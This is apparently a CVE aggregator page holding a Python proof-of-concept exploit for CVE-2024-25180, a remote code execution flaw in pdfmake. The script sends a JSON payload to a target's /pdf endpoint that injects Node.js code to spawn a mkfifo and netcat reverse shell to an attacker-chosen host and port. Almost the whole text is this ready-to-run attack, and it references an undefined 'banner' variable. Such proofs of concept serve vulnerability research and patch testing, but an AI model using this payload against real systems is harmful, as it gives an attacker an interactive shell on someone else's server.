CVE-2024-25180 – CVE Helper

README.md

Rendering markdown...

POC / CVE-2024-25180.py PY

⬇ Raw GitHub ✕ Close

#!/usr/bin/env python3

import sys
import requests

print("CVE-2024-25180 Remote Code Execution in pdfmake")

if len(sys.argv) != 5:
    print(banner)
    print("Usage: {} <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>".format(sys.argv[0]))
    sys.exit(1)

target_ip = sys.argv[1]
target_port = sys.argv[2]
local_ip = sys.argv[3]
local_port = sys.argv[4]

url = f"http://{target_ip}:{target_port}/pdf"
headers = {'Content-Type': 'application/json'}
data = {
    "content": "this.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {} {} >/tmp/f').toString(); const dd = 2".format(local_ip, local_port)
}

try:
    response = requests.post(url, headers=headers, json=data, verify=False)
    response.raise_for_status()
except requests.exceptions.RequestException as e:
    print(f"An error occurred: {e}")